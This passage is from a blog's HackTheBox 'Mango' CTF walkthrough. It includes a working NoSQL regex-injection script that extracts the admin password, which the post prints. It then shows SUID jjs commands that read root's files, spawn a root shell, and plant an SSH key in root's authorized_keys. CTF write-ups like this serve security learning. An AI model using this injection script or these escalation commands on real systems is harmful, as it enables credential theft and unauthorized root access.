2020</span><br><span class="line"></span><br><span class="line">  System load:  0.01               Processes:            103</span><br><span class="line">  Usage of /:   25.9% of 19.56GB   Users logged <span class="keyword">in</span>:      0</span><br><span class="line">  Memory usage: 11%                IP address <span class="keyword">for</span> ens33: 10.10.10.162</span><br><span class="line">  Swap usage:   3%</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"> * Canonical Livepatch is available <span class="keyword">for</span> installation.</span><br><span class="line">   - Reduce system reboots and improve kernel security. Activate at:</span><br><span class="line">     https://ubuntu.com/livepatch</span><br><span class="line"></span><br><span class="line">122 packages can be updated.</span><br><span class="line">18 updates are security updates.</span><br><span class="line"></span><br><span class="line">Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">Last login: Sat Apr 18 21:49:56 2020 from 10.10.14.192</span><br><span class="line">mango@mango:~$</span><br></pre></td></tr></table></figure>

<p>I thought i can now get the <code>user.txt</code> until I remember there was another user that I see on the <code>Under Plantation</code> page the <code>admin</code> user. The next I did is to extract also the password using my python script, I just change only the line – <code>username:&quot;mango&quot;</code> to <code>username:&quot;admin&quot;</code> and execute the script.</p>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="comment"># python</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">import</span> urllib3</span><br><span class="line"><span class="keyword">import</span> string</span><br><span class="line"><span class="keyword">import</span> urllib</span><br><span class="line">urllib3.disable_warnings()</span><br><span class="line"></span><br><span class="line">username=<span class="string">"admin"</span> <span class="comment">#enter the username</span></span><br><span class="line">password=<span class="string">""</span></span><br><span class="line">u=<span class="string">"http://staging-order.mango.htb"</span> <span class="comment"># Enter the url here</span></span><br><span class="line">headers=&#123;<span class="string">'content-type'</span>: <span class="string">'application/x-www-form-urlencoded'</span>, <span class="string">'staging-order.mango.htb'</span>: <span class="string">''</span>&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">while</span> <span class="literal">True</span>:</span><br><span class="line">    <span class="keyword">for</span> c <span class="keyword">in</span> string.printable:</span><br><span class="line">        <span class="keyword">if</span> c <span class="keyword">not</span> <span class="keyword">in</span> [<span class="string">'*'</span>,<span class="string">'+'</span>,<span class="string">'.'</span>,<span class="string">'?'</span>,<span class="string">'|'</span>,<span class="string">'&amp;'</span>,<span class="string">'\\'</span>]:</span><br><span class="line">            payload=<span class="string">'username=%s&amp;password[$regex]=^%s.*&amp;login=login'</span>% (username,password + c)</span><br><span class="line">            r = requests.post(u, data = payload, headers = headers, verify = <span class="literal">False</span>, allow_redirects = <span class="literal">False</span>)</span><br><span class="line">            <span class="comment">#print(payload)</span></span><br><span class="line">            <span class="comment">#print(r.status_code)</span></span><br><span class="line">            <span class="keyword">if</span> r.status_code == <span class="number">302</span>:</span><br><span class="line">                print(<span class="string">"Found one more char : %s"</span> % (password+c))</span><br><span class="line">                password += c</span><br></pre></td></tr></table></figure>

<p>after 10 minutes the admin password is completed.</p>
<figure class="highlight sh"><table><tr><td class="code"><pre><span class="line"><span class="comment"># bash</span></span><br><span class="line"></span><br><span class="line">admin:		t9KcS3&gt;!0B<span class="comment">#2</span></span><br></pre></td></tr></table></figure>

<p>now with mango shell I just switch the user and finally get the <code>user.txt</code> :</p>
<figure class="highlight sh"><table><tr><td class="code"><pre><span class="line"><span class="comment"># bash</span></span><br><span class="line"></span><br><span class="line">mango@mango:~$ su admin</span><br><span class="line">Password: </span><br><span class="line">$ id</span><br><span class="line">uid=4000000000(admin) gid=1001(admin) groups=1001(admin)</span><br><span class="line">$ ls</span><br><span class="line">exploit.sh  leon.sh</span><br><span class="line">$ /bin/bash -i</span><br><span class="line">To run a <span class="built_in">command</span> as administrator (user <span class="string">"root"</span>), use <span class="string">"sudo &lt;command&gt;"</span>.</span><br><span class="line">See <span class="string">"man sudo_root"</span> <span class="keyword">for</span> details.</span><br><span class="line"></span><br><span class="line">admin@mango:/home/mango$ <span class="built_in">cd</span> ..</span><br><span class="line">admin@mango:/home$ ls</span><br><span class="line">admin  mango</span><br><span class="line">admin@mango:/home$ <span class="built_in">cd</span> admin</span><br><span class="line">admin@mango:/home/admin$ ls</span><br><span class="line">user.txt</span><br><span class="line">admin@mango:/home/admin$ cat user.txt</span><br><span class="line">79bf3[---------------------]47e92</span><br><span class="line">admin@mango:/home/admin$</span><br></pre></td></tr></table></figure>
<hr>
<h2 id="Privilege-Escalation"><a href="#Privilege-Escalation" class="headerlink" title="Privilege Escalation"></a>Privilege Escalation</h2><h3 id="JJS-Exploitation"><a href="#JJS-Exploitation" class="headerlink" title="JJS Exploitation"></a>JJS Exploitation</h3><p>For privilege escalation phase I will use <a href="https://github.com/rebootuser/LinEnum" target="_blank" rel="noopener">LinEnum.sh</a> to look for some stuffs that I will use to get the admin shell.</p>
<p>so from my Kali Linux machine, i transfer <code>LinEnum</code> to the target and execute.</p>
<p>As always it will show the basic information of the vulnerable machine.</p>
<figure class="highlight c#"><table><tr><td class="code"><pre><span class="line"><span class="meta"># bash</span></span><br><span class="line"></span><br><span class="line">admin@mango:/tmp$ bash LinEnum.sh</span><br><span class="line"></span><br><span class="line"><span class="meta">#########################################################</span></span><br><span class="line"><span class="meta"># Local Linux Enumeration &amp; Privilege Escalation Script #</span></span><br><span class="line"><span class="meta">#########################################################</span></span><br><span class="line"><span class="meta"># www.rebootuser.com</span></span><br><span class="line"><span class="meta"># version 0.982</span></span><br><span class="line"></span><br><span class="line">[<span class="meta">-</span>] Debug Info</span><br><span class="line">[<span class="meta">+</span>] Thorough tests = Disabled</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">Scan started at:</span><br><span class="line">Sat Apr <span class="number">18</span> <span class="number">22</span>:<span class="number">52</span>:<span class="number">10</span> UTC <span class="number">2020</span>                                                                                                                                                               </span><br><span class="line">                                                                                                                                                                                           </span><br><span class="line"></span><br><span class="line"><span class="meta">### SYSTEM ##############################################</span></span><br><span class="line">[<span class="meta">-</span>] Kernel information:</span><br><span class="line">Linux mango <span class="number">4.15</span><span class="number">.0</span><span class="number">-64</span>-generic <span class="meta">#73-Ubuntu SMP Thu Sep 12 13:16:13 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">[<span class="meta">-</span>] <span class="function">Kernel <span class="title">information</span> (<span class="params">continued</span>):</span></span><br><span class="line"><span class="function">Linux version 4.15.0-64-<span class="title">generic</span> (<span class="params">buildd@lgw01-amd64<span class="number">-038</span></span>) (<span class="params">gcc version <span class="number">7.4</span><span class="number">.0</span> (Ubuntu <span class="number">7.4</span><span class="number">.0</span><span class="number">-1u</span>buntu1~<span class="number">18.04</span><span class="number">.1</span></span>)) #73-Ubuntu SMP Thu Sep 12 13:16:13 UTC 2019</span></span><br><span class="line"><span class="function"></span></span><br><span class="line"><span class="function"></span></span><br><span class="line"><span class="function">[-] Specific release information:</span></span><br><span class="line"><span class="function">DISTRIB_ID</span>=Ubuntu</span><br><span class="line">DISTRIB_RELEASE=<span class="number">18.04</span></span><br><span class="line">DISTRIB_CODENAME=bionic</span><br><span class="line">DISTRIB_DESCRIPTION=<span class="string">"Ubuntu 18.04.2 LTS"</span></span><br><span class="line">NAME=<span class="string">"Ubuntu"</span></span><br><span class="line">VERSION=<span class="string">"18.04.2 LTS (Bionic Beaver)"</span></span><br><span class="line">ID=ubuntu</span><br><span class="line">ID_LIKE=debian</span><br><span class="line">PRETTY_NAME=<span class="string">"Ubuntu 18.04.2 LTS"</span></span><br><span class="line">VERSION_ID=<span class="string">"18.04"</span></span><br><span class="line">HOME_URL=<span class="string">"https://www.ubuntu.com/"</span></span><br><span class="line">SUPPORT_URL=<span class="string">"https://help.ubuntu.com/"</span></span><br><span class="line">BUG_REPORT_URL=<span class="string">"https://bugs.launchpad.net/ubuntu/"</span></span><br><span class="line">PRIVACY_POLICY_URL=<span class="string">"https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"</span></span><br><span class="line">VERSION_CODENAME=bionic</span><br><span class="line">UBUNTU_CODENAME=bionic</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">[<span class="meta">-</span>] Hostname:</span><br><span class="line">mango</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="meta">### USER/GROUP ##########################################</span></span><br><span class="line">[<span class="meta">-</span>] Current user/<span class="keyword">group</span> info:</span><br><span class="line">uid=<span class="number">4000000000</span>(admin) gid=<span class="number">1001</span>(admin) groups=<span class="number">1001</span>(admin)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">[<span class="meta">-</span>] Users that have previously logged onto the system:</span><br><span class="line">Username         Port     From             Latest</span><br><span class="line">root             pts/<span class="number">1</span>    <span class="number">10.10</span><span class="number">.14</span><span class="number">.247</span>     Sat Apr <span class="number">18</span> <span class="number">21</span>:<span class="number">13</span>:<span class="number">13</span> +<span class="number">0000</span> <span class="number">2020</span></span><br><span class="line">mango            pts/<span class="number">0</span>    <span class="number">10.10</span><span class="number">.15</span><span class="number">.230</span>     Sat Apr <span class="number">18</span> <span class="number">22</span>:<span class="number">39</span>:<span class="number">51</span> +<span class="number">0000</span> <span class="number">2020</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">[<span class="meta">-</span>] Who <span class="keyword">else</span> <span class="keyword">is</span> logged <span class="keyword">on</span>:</span><br><span class="line"> <span class="number">22</span>:<span class="number">52</span>:<span class="number">10</span> up  <span class="number">1</span>:<span class="number">41</span>,  <span class="number">1</span> user,  load average: <span class="number">0.01</span>, <span class="number">0.02</span>, <span class="number">0.00</span></span><br><span class="line">USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT</span><br><span class="line">mango    pts/<span class="number">0</span>    <span class="number">10.10</span><span class="number">.15</span><span class="number">.230</span>     <span class="number">22</span>:<span class="number">39</span>    <span class="number">2.00</span>s  <span class="number">2.52</span>s  <span class="number">0.01</span>s sshd: mango [priv]</span><br></pre></td></tr></table></figure>

<p>Going deep of the recon I see interesting stuffs which is the <code>JJS</code> installed.</p>
<figure class="highlight c#"><table><tr><td class="code"><pre><span class="line"><span class="meta"># bash</span></span><br><span class="line"></span><br><span class="line">[<span class="meta">+</span>] Possibly interesting SUID files:</span><br><span class="line">-rwsr-sr-- <span class="number">1</span> root admin <span class="number">10352</span> Jul <span class="number">18</span>  <span class="number">2019</span> /usr/lib/jvm/java<span class="number">-11</span>-openjdk-amd64/bin/jjs</span><br></pre></td></tr></table></figure>

<p>As you can see <code>jjs</code> is owned also by <code>root</code>, after the script is finish running. I also checked the other <em>SUID</em> :</p>
<figure class="highlight sh"><table><tr><td class="code"><pre><span class="line"><span class="comment"># bash</span></span><br><span class="line"></span><br><span class="line">admin@mango:/home/mango$ find / -perm -4000 -user root 2&gt;/dev/null</span><br><span class="line">/bin/fusermount</span><br><span class="line">/bin/mount</span><br><span class="line">/bin/umount</span><br><span class="line">/bin/su</span><br><span class="line">/bin/ping</span><br><span class="line">/snap/core/7713/bin/mount</span><br><span class="line">/snap/core/7713/bin/ping</span><br><span class="line">/snap/core/7713/bin/ping6</span><br><span class="line">/snap/core/7713/bin/su</span><br><span class="line">/snap/core/7713/bin/umount</span><br><span class="line">/snap/core/7713/usr/bin/chfn</span><br><span class="line">/snap/core/7713/usr/bin/chsh</span><br><span class="line">/snap/core/7713/usr/bin/gpasswd</span><br><span class="line">/snap/core/7713/usr/bin/newgrp</span><br><span class="line">/snap/core/7713/usr/bin/passwd</span><br><span class="line">/snap/core/7713/usr/bin/sudo</span><br><span class="line">/snap/core/7713/usr/lib/dbus-1.0/dbus-daemon-launch-helper</span><br><span class="line">/snap/core/7713/usr/lib/openssh/ssh-keysign</span><br><span class="line">/snap/core/7713/usr/lib/snapd/snap-confine</span><br><span class="line">/snap/core/7713/usr/sbin/pppd</span><br><span class="line">/snap/core/6350/bin/mount</span><br><span class="line">/snap/core/6350/bin/ping</span><br><span class="line">/snap/core/6350/bin/ping6</span><br><span class="line">/snap/core/6350/bin/su</span><br><span class="line">/snap/core/6350/bin/umount</span><br><span class="line">/snap/core/6350/usr/bin/chfn</span><br><span class="line">/snap/core/6350/usr/bin/chsh</span><br><span class="line">/snap/core/6350/usr/bin/gpasswd</span><br><span class="line">/snap/core/6350/usr/bin/newgrp</span><br><span class="line">/snap/core/6350/usr/bin/passwd</span><br><span class="line">/snap/core/6350/usr/bin/sudo</span><br><span class="line">/snap/core/6350/usr/lib/dbus-1.0/dbus-daemon-launch-helper</span><br><span class="line">/snap/core/6350/usr/lib/openssh/ssh-keysign</span><br><span class="line">/snap/core/6350/usr/lib/snapd/snap-confine</span><br><span class="line">/snap/core/6350/usr/sbin/pppd</span><br><span class="line">/usr/bin/newuidmap</span><br><span class="line">/usr/bin/newgrp</span><br><span class="line">/usr/bin/gpasswd</span><br><span class="line">/usr/bin/passwd</span><br><span class="line">/usr/bin/newgidmap</span><br><span class="line">/usr/bin/run-mailcap</span><br><span class="line">/usr/bin/chfn</span><br><span class="line">/usr/bin/chsh</span><br><span class="line">/usr/bin/sudo</span><br><span class="line">/usr/bin/traceroute6.iputils</span><br><span class="line">/usr/bin/pkexec</span><br><span class="line">/usr/lib/dbus-1.0/dbus-daemon-launch-helper</span><br><span class="line">/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic</span><br><span class="line">/usr/lib/policykit-1/polkit-agent-helper-1</span><br><span class="line">/usr/lib/eject/dmcrypt-get-device</span><br><span class="line">/usr/lib/jvm/java-11-openjdk-amd64/bin/jjs</span><br><span class="line">/usr/lib/openssh/ssh-keysign</span><br><span class="line">/usr/lib/snapd/snap-confine</span><br><span class="line">admin@mango:/home/mango$</span><br></pre></td></tr></table></figure>

<h3 id="Get-the-root-txt"><a href="#Get-the-root-txt" class="headerlink" title="Get the root.txt"></a>Get the root.txt</h3><p>I get a hint from the forum, the privilege escalation part is <a href="gtfobins/jjs/">#GTFObins</a> so I go the website and checked about <code>JJS</code> :</p>
<p><img src="/img/mango/shell.PNG" alt="HackTheBox-Sniper" title="JJS"></p>
<p>According to <code>#GTFObins</code>, we are able to spawn an interactive shell with elevated permissions, I used <code>File read</code> to catch <code>root.txt</code> at <code>/root/</code> directory and yes ! I’m allowed to read that.</p>
<p><img src="/img/mango/file-read.PNG" alt="HackTheBox-Sniper" title="JJS"></p>
<figure class="highlight java"><table><tr><td class="code"><pre><span class="line"># java</span><br><span class="line"></span><br><span class="line">admin<span class="meta">@mango</span>:/home/admin$ jjs</span><br><span class="line">Warning: The jjs tool is planned to be removed from a future JDK release</span><br><span class="line">jjs&gt; <span class="keyword">var</span> BufferedReader = Java.type(<span class="string">"java.io.BufferedReader"</span>); <span class="keyword">var</span> FileReader = Java.type(<span class="string">"java.io.FileReader"</span>); <span class="keyword">var</span> br = <span class="keyword">new</span> BufferedReader(<span class="keyword">new</span> FileReader(<span class="string">"/root/root.txt"</span>)); <span class="keyword">while</span> ((line = br.readLine()) != <span class="keyword">null</span>) &#123; print(line); &#125;</span><br><span class="line"><span class="number">8</span>a8ef[---------------------]<span class="number">9</span>ab15</span><br><span class="line">jjs&gt; exit()</span><br><span class="line">admin<span class="meta">@mango</span>:/home/admin$</span><br></pre></td></tr></table></figure>

<p>I also try the <code>SUID</code> when I execute it my session terminal shell is hang up but I get the administrator shell.</p>
<p><img src="/img/mango/suid.PNG" alt="HackTheBox-Sniper" title="JJS"></p>
<figure class="highlight"><table><tr><td class="code"><pre><span class="line"># java</span><br><span class="line"></span><br><span class="line">admin<span class="meta">@mango</span>:/home/mango$ echo <span class="string">"Java.type('java.lang.Runtime').getRuntime().exec('/bin/sh -pc \$@|sh\$&#123;IFS&#125;-p _ echo sh -p &lt;$(tty) &gt;$(tty) 2&gt;$(tty)').waitFor()"</span> | jjs</span><br><span class="line">Warning: The jjs tool is planned to be removed from a future JDK release</span><br><span class="line">jjs&gt; Java.type(<span class="string">'java.lang.Runtime'</span>).getRuntime().exec(<span class="string">'/bin/sh -pc $@|sh$&#123;IFS&#125;-p _ echo sh -p &lt;/dev/pts/1 &gt;/dev/pts/1 2&gt;/dev/pts/1'</span>).waitFor()</span><br><span class="line">#</span><br></pre></td></tr></table></figure>

<h3 id="Administrator-Shell"><a href="#Administrator-Shell" class="headerlink" title="Administrator Shell"></a>Administrator Shell</h3><p>I am not satisfy what I did because I want to catch the admin shell and get again the <code>root.txt</code> I have only one options remaining the <code>File write</code> functions.</p>
<p><img src="/img/mango/file-write.PNG" alt="HackTheBox-Sniper" title="JJS"></p>
<p>So my idea is to inject <code>SSH key</code> to <code>/root/.ssh/</code> directory and login as root with my <code>rsa keys</code> so first i will generate my <code>SSH Keys</code> with commad <code>&#39;ssh-key -t rsa&#39;</code> then copy the <code>id_rsa.pub</code> and echo it into a file in the <code>/tmp</code> directory so :</p>
<figure class="highlight sh"><table><tr><td class="code"><pre><span class="line"><span class="comment"># bash</span></span><br><span class="line"></span><br><span class="line">admin@mango:/home/mango$ <span class="built_in">echo</span> <span class="string">"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDrIFVL39sxNcAJY5yNM2XxpZtDIeZXI3/HrPW465dJPzS8QqnytUf8pYR2cg9tk3E5CV4XjaYn3MxwDuQ3b5NWjvnqS/8KOCyM1FKQAON/zE055LmxUsv4XysN6bD5HK/wtykAdHCOTvnN2PSQjUMCLe7RDep4Y37KvJdiyN1BnoccHqFo+7BV2PnuBk5rs5o1cG13Knex5hTQhbgXvARqy8nGLeJGjrryl2xsKdyBYeKzBsLLKIEj12LVWBk4zkedDLdcSBMMaioowjB53b+m0/Rel0DT35MLxK1evJL5O2QSQE4qicRKt+verPogttcwq8zWn21orFasRN65kjWM8LKzdgqt8XpGEZ6L/ATZr4rhgu2eduGOuWwMWob6MttdT7X4qAZsfrMdTKuVdJa217dq4U72CJ3a6Re0CQrRxS7eoQHWcYvYIewWbHq/ro+xsyTR7gMDmW82UoE0TZV3/b9WXWgjdQvnVVQ8rxJHVegZAUCFq8LwwBq/Alh6gys= root@Payas0"</span> &gt; /tmp/ssh</span><br></pre></td></tr></table></figure>

<p>And now overwrite the root’s <code>authorized_keys</code> file :</p>
<figure class="highlight sh"><table><tr><td class="code"><pre><span class="line"><span class="comment"># bash</span></span><br><span class="line"></span><br><span class="line">admin@mango:/home/mango$ <span class="built_in">echo</span> <span class="string">"Java.type('java.lang.Runtime').getRuntime().exec('cp /tmp/ssh /root/.ssh/authorized_keys').waitFor()"</span> | jjs</span><br><span class="line">Warning: The jjs tool is planned to be removed from a future JDK release</span><br><span class="line">jjs&gt; Java.type(<span class="string">'java.lang.Runtime'</span>).getRuntime().<span class="built_in">exec</span>(<span class="string">'cp /tmp/ssh /root/.ssh/authorized_keys'</span>).waitFor()</span><br><span class="line">0</span><br><span class="line">jjs&gt;</span><br><span class="line">admin@mango:/home/mango$</span><br></pre></td></tr></table></figure>

<p>Now that I setup all’ I’ll login as a root and finally have the last shell and also catch again the <code>root.txt</code> :</p>
<figure class="highlight sh"><table><tr><td class="code"><pre><span class="line"><span class="comment"># bash</span></span><br><span class="line"></span><br><span class="line">root <span class="keyword">in</span> htb/boxes/Mango via 🐍 v2.7.17 </span><br><span class="line">❯ ssh -i /root/.ssh/id_rsa root@10.10.10.162</span><br><span class="line">Welcome to Ubuntu 18.04.2 LTS (GNU/Linux 4.15.0-64-generic x86_64)</span><br><span class="line"></span><br><span class="line"> * Documentation:  https://help.ubuntu.com</span><br><span class="line"> * Management:     https://landscape.canonical.com</span><br><span class="line"> * Support:        https://ubuntu.com/advantage</span><br><span class="line"></span><br><span class="line">  System information as of Sat Apr 18 23:40:32 UTC 2020</span><br><span class="line"></span><br><span class="line">  System load:  0.04               Processes:            114</span><br><span class="line">  Usage of /:   25.8% of 19.56GB   Users logged <span class="keyword">in</span>:      1</span><br><span class="line">  Memory usage: 11%                IP address <span class="keyword">for</span> ens33: 10.10.10.162</span><br><span class="line">  Swap usage:   4%</span><br><span class="line"></span><br><span class="line"> * Kata Containers are now fully integrated <span class="keyword">in</span> Charmed Kubernetes 1.16!</span><br><span class="line">   Yes, charms take the Krazy out of K8s Kata Kluster Konstruction.</span><br><span class="line"></span><br><span class="line">     https://ubuntu.com/kubernetes/docs/release-notes</span><br><span class="line"></span><br><span class="line"> * Canonical Livepatch is available <span class="keyword">for</span> installation.</span><br><span class="line">   - Reduce system reboots and improve kernel security. Activate at:</span><br><span class="line">     https://ubuntu.com/livepatch</span><br><span class="line"></span><br><span class="line">122 packages can be updated.</span><br><span class="line">18 updates are security updates.</span><br><span class="line"></span><br><span class="line">Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">Last login: Sat Apr 18 23:25:35 2020 from 10.10.14.43</span><br><span class="line">root@mango:~<span class="comment"># id</span></span><br><span class="line">uid=0(root) gid=0(root) groups=0(root)</span><br><span class="line">root@mango:~<span class="comment"># ls</span></span><br><span class="line">root.txt</span><br><span class="line">root@mango:~<span class="comment"># cat root.txt</span></span><br><span class="line">8a8ef[---------------------]9ab15</span><br><span class="line">root@mango:~<span class="comment">#</span></span><br></pre></td></tr></table></figure>

<hr>
<p>If you liked my writeup please leave a respect on my <a href="https://www.hackthebox.eu/profile/128965" target="_blank" rel="noopener">Profile</a></p>
<p><img src="https://www.hackthebox.eu/badge/image/128965" alt="Payas0" title="Payas0"></p>
<hr>
<p>Referrences:</p>
<p><a href="https://blog.0daylabs.com/2016/09/05/mongo-db-password-extraction-mmactf-100/" target="_blank" rel="noopener">Extracting MongoDB password with NoSQL Injection</a></p>
<p><a href="https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/NoSQL%20Injection" target="_blank" rel="noopener">NoSQL Injection</a></p>
<p><a href="https://cornerpirate.com/2018/08/17/java-gives-a-shell-for-everything/" target="_blank" rel="noopener">Java gives a shell for everthing</a></p>
<p><a href="https://gtfobins.github.io/gtfobins/jjs/" target="_blank" rel="noopener">#GTFObins - JJS</a></p>

  </div>
</article>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
         
          <li><a href="/">Home</a></li>
         
          <li><a href="/categories/">Categories</a></li>
         
          <li><a href="/search/">Search</a></li>
         
          <li><a href="/tags/">Tags</a></li>
         
          <li><a href="/about/">About</a></li>
         
          <li><a href="/archives/">Posts</a></li>
         
          <li><a href="/projects/">Projects</a></li>
        
      </ul>
    </div>

    <div id="toc-footer" style="display: none">
      <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#Quick-Summary"><span class="toc-number">1.</span> <span class="toc-text">Quick Summary</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Penetration-Testing-Methodologies"><span class="toc-number">2.</span> <span class="toc-text">Penetration Testing Methodologies</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Network-Scanning"><span class="toc-number">3.</span> <span class="toc-text">Network Scanning</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Walkthrough"><span class="toc-number">3.1.</span> <span class="toc-text">Walkthrough</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Nmap-results"><span class="toc-number">3.2.</span> <span class="toc-text">Nmap results</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Enumeration"><span class="toc-number">4.</span> <span class="toc-text">Enumeration</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Mango-Website"><span class="toc-number">4.1.</span> <span class="toc-text">Mango Website</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Post-Exploitation"><span class="toc-number">5.</span> <span class="toc-text">Post - Exploitation</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Bypass-Login"><span class="toc-number">5.1.</span> <span class="toc-text">Bypass Login</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Under-Plantation"><span class="toc-number">5.2.</span> <span class="toc-text">Under Plantation</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Exploitation"><span class="toc-number">6.</span> <span class="toc-text">Exploitation</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#NoSQL-Injection"><span class="toc-number">6.1.</span> <span class="toc-text">NoSQL Injection</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Get-user-shell"><span class="toc-number">6.2.</span> <span class="toc-text">Get user shell</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Privilege-Escalation"><span class="toc-number">7.</span> <span class="toc-text">Privilege Escalation</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#JJS-Exploitation"><span class="toc-number">7.1.</span> <span class="toc-text">JJS Exploitation</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Get-the-root-txt"><span class="toc-number">7.2.</span> <span class="toc-text">Get the root.txt</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Administrator-Shell"><span class="toc-number">7.3.</span> <span class="toc-text">Administrator Shell</span></a></li></ol></li></ol>
    </div>

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" href="http://www.facebook.com/sharer.php?u=https://ph-payas0.github.io/2020-04-18/HackTheBox-Mango/" target="_blank" rel="noopener"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://twitter.com/share?url=https://ph-payas0.github.io/2020-04-18/HackTheBox-Mango/&text=HackTheBox - Mango 🥭🥭" target="_blank" rel="noopener"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.linkedin.com/shareArticle?url=https://ph-payas0.github.io/2020-04-18/HackTheBox-Mango/&title=HackTheBox - Mango 🥭🥭" target="_blank" rel="noopener"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://pinterest.com/pin/create/bookmarklet/?url=https://ph-payas0.github.io/2020-04-18/HackTheBox-Mango/&is_video=false&description=HackTheBox - Mango 🥭🥭" target="_blank" rel="noopener"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=HackTheBox - Mango 🥭🥭&body=Check out this article: https://ph-payas0.github.io/2020-04-18/HackTheBox-Mango/"><i class="fas fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://getpocket.com/save?url=https://ph-payas0.github.io/2020-04-18/HackTheBox-Mango/&title=HackTheBox - Mango 🥭🥭" target="_blank" rel="noopener"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://reddit.com/submit?url=https://ph-payas0.github.io/2020-04-18/HackTheBox-Mango/&title=HackTheBox - Mango 🥭🥭" target="_blank" rel="noopener"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.stumbleupon.com/submit?url=https://ph-payas0.github.io/2020-04-18/HackTheBox-Mango/&title=HackTheBox - Mango 🥭🥭" target="_blank" rel="noopener"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://digg.com/submit?url=https://ph-payas0.github.io/2020-04-18/HackTheBox-Mango/&title=HackTheBox - Mango 🥭🥭" target="_blank" rel="noopener"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.tumblr.com/share/link?url=https://ph-payas0.github.io/2020-04-18/HackTheBox-Mango/&name=HackTheBox - Mango 🥭🥭&description=" target="_blank" rel="noopener"><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://news.ycombinator.com/submitlink?u=https://ph-payas0.github.io/2020-04-18/HackTheBox-Mango/&t=HackTheBox - Mango 🥭🥭" target="_blank" rel="noopener"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fas fa-bars fa-lg" aria-hidden="true"></i> Menu</a>
        <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fas fa-list fa-lg" aria-hidden="true"></i> TOC</a>
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fas fa-share-alt fa-lg" aria-hidden="true"></i> Share</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up fa-lg" aria-hidden="true"></i> Top</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    InfoSec &#64; medz
  </div>
  <div class="footer-right">
    <nav>
      <ul>
         
          <li><a href="/">Home</a></li>
         
          <li><a href="/categories/">Categories</a></li>
         
          <li><a href="/search/">Search</a></li>
         
          <li><a href="/tags/">Tags</a></li>
         
          <li><a href="/about/">About</a></li>
         
          <li><a href="/archives/">Posts</a></li>
         
          <li><a href="/projects/">Projects</a></li>
        
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->

<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">


<link rel="stylesheet" href="/lib/justified-gallery/css/justifiedGallery.min.css">


    <!-- jquery -->

<script src="/lib/jquery/jquery.min.js"></script>


<script src="/lib/justified-gallery/js/jquery.justifiedGallery.min.js"></script>

<!-- clipboard -->

  
<script src="/lib/clipboard/clipboard.min.js"></script>

  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"Copy to clipboard!\">";
    btn += '<i class="far fa-clone"></i>';
    btn += '</span>'; 
